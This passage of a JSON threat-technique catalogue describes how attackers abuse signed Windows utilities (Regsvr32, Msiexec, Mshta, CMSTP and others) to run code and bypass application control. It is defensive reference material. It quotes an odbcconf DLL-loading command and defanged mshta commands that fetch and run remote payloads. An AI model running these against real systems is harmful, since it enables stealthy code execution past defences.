            "description": "Adversaries may abuse Regsvr32.exe to proxy execution of malicious code. Regsvr32.exe is a command-line program used to register and unregister object linking and embedding controls, including dynamic link libraries (DLLs), on Windows systems. The Regsvr32.exe binary may also be signed by Microsoft. \r\n\r\nMalicious usage of Regsvr32.exe may avoid triggering security tools that may not monitor execution of, and modules loaded by, the regsvr32.exe process because of allowlists or false positives from Windows using regsvr32.exe for normal operations. Regsvr32.exe can also be used to specifically bypass application control using functionality to load COM scriptlets to execute DLLs under user permissions. Since Regsvr32.exe is network and proxy aware, the scripts can be loaded by passing a uniform resource locator (URL) to file on an external Web server as an argument during invocation. This method makes no changes to the Registry as the COM object is not actually registered, only executed. This variation of the technique is often referred to as a \"Squiblydoo\" and has been used in campaigns targeting governments.\r\n\r\nRegsvr32.exe can also be leveraged to register a COM Object used to establish persistence via Component Object Model Hijacking.",
            "resources": "https://attack.mitre.org/techniques/T1218/010/",
            "creation_date": "2023-03-05T00:14:46.485000Z",
            "tags": "Defense Evasion,\r\nbypass application control,\r\nload COM scriptlets,\r\nexecute DLLs,\r\nuniform resource locator (URL),\r\nexternal web server,\r\nSquiblydoo,\r\nComponent Object Model Hijacking,\r\nAPT19,\r\nAPT32,\r\nmaintain persistence,\r\nexecute malicious code,\r\nexecute malicious DLLs,\r\nexecute malicious scripts,",
            "modification_date": "2023-10-04T10:43:31.131000Z",
            "category": [
                10
            ],
            "rules": [],
            "attachments": [],
            "featured_api": [],
            "contributors": []
        },
        {
            "id": 326,
            "key": "system-binary-proxy-execution-regsvcsregasm",
            "unprotect_id": "T1218.009",
            "name": "System Binary Proxy Execution: Regsvcs/Regasm",
            "description": "Adversaries may abuse Regsvcs and Regasm to proxy execution of code through a trusted Windows utility. Regsvcs and Regasm are Windows command-line utilities that are used to register .NET Component Object Model (COM) assemblies. Both are binaries that may be digitally signed by Microsoft. \r\n\r\nBoth utilities may be used to bypass application control through use of attributes within the binary to specify code that should be run before registration or unregistration: [ComRegisterFunction] or [ComUnregisterFunction] respectively. The code with the registration and unregistration attributes will be executed even if the process is run under insufficient privileges and fails to execute",
            "resources": "https://attack.mitre.org/techniques/T1218/009/",
            "creation_date": "2023-03-05T00:09:28.754000Z",
            "tags": "Defense Evasion,\r\nregister .NET Component Object Model (COM) assemblies,\r\nbypass application control,\r\n[ComRegisterFunction],\r\n[ComUnregisterFunction],",
            "modification_date": "2023-10-04T10:44:23.084000Z",
            "category": [
                10
            ],
            "rules": [],
            "attachments": [],
            "featured_api": [],
            "contributors": []
        },
        {
            "id": 325,
            "key": "system-binary-proxy-execution-odbcconf",
            "unprotect_id": "T1218.008",
            "name": "System Binary Proxy Execution: Odbcconf",
            "description": "Adversaries may abuse odbcconf.exe to proxy execution of malicious payloads. Odbcconf.exe is a Windows utility that allows you to configure Open Database Connectivity (ODBC) drivers and data source names. The Odbcconf.exe binary may be digitally signed by Microsoft.\r\n\r\nAdversaries may abuse odbcconf.exe to bypass application control solutions that do not account for its potential abuse. Similar to Regsvr32, odbcconf.exe has a REGSVR flag that can be misused to execute DLLs (ex: odbcconf.exe /S /A {REGSVR \"C:\\Users\\Public\\file.dll\"})",
            "resources": "https://attack.mitre.org/techniques/T1218/008/",
            "creation_date": "2023-03-05T00:02:22.858000Z",
            "tags": "Defense Evasion,\r\nOpen Database Connectivity (ODBC),\r\nbypass application control solutions,\r\nREGSVR,\r\nexecution of malicious DLL files,",
            "modification_date": "2023-10-04T10:43:30.090000Z",
            "category": [
                10
            ],
            "rules": [],
            "attachments": [],
            "featured_api": [],
            "contributors": []
        },
        {
            "id": 324,
            "key": "system-binary-proxy-execution-msiexec",
            "unprotect_id": "T1218.007",
            "name": "System Binary Proxy Execution: Msiexec",
            "description": "Adversaries may abuse msiexec.exe to proxy execution of malicious payloads. Msiexec.exe is the command-line utility for the Windows Installer and is thus commonly associated with executing installation packages (.msi). The Msiexec.exe binary may also be digitally signed by Microsoft.\r\n\r\nAdversaries may abuse msiexec.exe to launch local or network accessible MSI files. Msiexec.exe can also execute DLLs. Since it may be signed and native on Windows systems, msiexec.exe can be used to bypass application control solutions that do not account for its potential abuse. Msiexec.exe execution may also be elevated to SYSTEM privileges if the AlwaysInstallElevated policy is enabled.",
            "resources": "https://attack.mitre.org/techniques/T1218/007/",
            "creation_date": "2023-03-04T23:52:27.696000Z",
            "tags": "Defense Evasion,\r\nmalicious installation packages (.msi),\r\nmalicious DLLs,\r\nbypass application control solutions,\r\nprivilege escalation,\r\nAlwaysInstallElevated,",
            "modification_date": "2023-10-04T10:44:22.823000Z",
            "category": [
                10
            ],
            "rules": [],
            "attachments": [],
            "featured_api": [],
            "contributors": []
        },
        {
            "id": 323,
            "key": "system-binary-proxy-execution-mshta",
            "unprotect_id": "T1218.005",
            "name": "System Binary Proxy Execution: Mshta",
            "description": "Adversaries may abuse mshta.exe to proxy execution of malicious .hta files and Javascript or VBScript through a trusted Windows utility. There are several examples of different types of threats leveraging mshta.exe during initial compromise and for execution of code.\r\n\r\nMshta.exe is a utility that executes Microsoft HTML Applications (HTA) files. HTAs are standalone applications that execute using the same models and technologies of Internet Explorer, but outside of the browser.\r\n\r\nFiles may be executed by mshta.exe through an inline script: mshta vbscript:Close(Execute(\"GetObject(\"\"script:https[:]//webserver/payload[.]sct\"\")\"))\r\n\r\nThey may also be executed directly from URLs: mshta http[:]//webserver/payload[.]hta\r\n\r\nMshta.exe can be used to bypass application control solutions that do not account for its potential use. Since mshta.exe executes outside of the Internet Explorer's security context, it also bypasses browser security settings.",
            "resources": "https://attack.mitre.org/techniques/T1218/005/",
            "creation_date": "2023-03-04T23:47:38.933000Z",
            "tags": "Defense Evasion,\r\nmshta.exe,\r\nMicrosoft HTML Applications (HTA) files,\r\nJavaScript,\r\nVBScript,\r\nmshta http[:]//webserver/payload[.]hta,\r\nmshta vbscript:Close(Execute(\"GetObject(\"\"script:https[:]//webserver/payload[.]sct\"\")\")),\r\nbypass application control,\r\nbypass browser security settings,\r\nAPT29,\r\nAPT32,\r\nexecute malicious scripts,",
            "modification_date": "2023-10-04T10:43:29.549000Z",
            "category": [
                10
            ],
            "rules": [],
            "attachments": [],
            "featured_api": [],
            "contributors": []
        },
        {
            "id": 322,
            "key": "system-binary-proxy-execution-installutil",
            "unprotect_id": "T1218.004",
            "name": "System Binary Proxy Execution: InstallUtil",
            "description": "Adversaries may use InstallUtil to proxy execution of code through a trusted Windows utility. InstallUtil is a command-line utility that allows for installation and uninstallation of resources by executing specific installer components specified in .NET binaries. The InstallUtil binary may also be digitally signed by Microsoft and located in the .NET directories on a Windows system: C:\\Windows\\Microsoft.NET\\Framework\\v\\InstallUtil.exe and C:\\Windows\\Microsoft.NET\\Framework64\\v\\InstallUtil.exe.\r\n\r\nInstallUtil may also be used to bypass application control through use of attributes within the binary that execute the class decorated with the attribute [System.ComponentModel.RunInstaller(true)].",
            "resources": "https://attack.mitre.org/techniques/T1218/004/",
            "creation_date": "2023-03-04T23:43:22.555000Z",
            "tags": "Defense Evasion,\r\nC:\\Windows\\Microsoft.NET\\Framework\\v\\InstallUtil.exe,\r\nC:\\Windows\\Microsoft.NET\\Framework64\\v\\InstallUtil.exe,\r\n[System.ComponentModel.RunInstaller(true)],\r\ndisable Windows Defender,\r\nexecute malicious code,",
            "modification_date": "2023-10-04T10:44:22.675000Z",
            "category": [
                10
            ],
            "rules": [],
            "attachments": [],
            "featured_api": [],
            "contributors": []
        },
        {
            "id": 321,
            "key": "system-binary-proxy-execution-cmstp",
            "unprotect_id": "T1218.003",
            "name": "System Binary Proxy Execution: CMSTP",
            "description": "Adversaries may abuse CMSTP to proxy execution of malicious code. The Microsoft Connection Manager Profile Installer (CMSTP.exe) is a command-line program used to install Connection Manager service profiles. CMSTP.exe accepts an installation information file (INF) as a parameter and installs a service profile leveraged for remote access connections.\r\n\r\nAdversaries may supply CMSTP.exe with INF files infected with malicious commands. Similar to Regsvr32 / \"Squiblydoo\", CMSTP.exe may be abused to load and execute DLLs and/or COM scriptlets (SCT) from remote servers. This execution may also bypass AppLocker and other application control defenses since CMSTP.exe is a legitimate binary that may be signed by Microsoft.\r\n\r\nCMSTP.exe can also be abused to Bypass User Account Control and execute arbitrary commands from a malicious INF through an auto-elevated COM interface.",
            "resources": "https://attack.mitre.org/techniques/T1218/003/",
            "creation_date": "2023-03-04T23:30:50.977000Z",
            "tags": "Defense Evasion,\r\nMicrosoft Connection Manager Profile Installer (CMSTP.exe),\r\nINF files,\r\nmalicious COM scriptlets (SCT),\r\nmalicious DLLs,\r\nbypass AppLocker,\r\nBypass User Account Control,",
            "modification_date": "2023-10-04T10:44:22.436000Z",
            "category": [
                10
            ],
            "rules": [],
            "attachments": [],
            "featured_api": [],
            "contributors": []
        }
    ]
}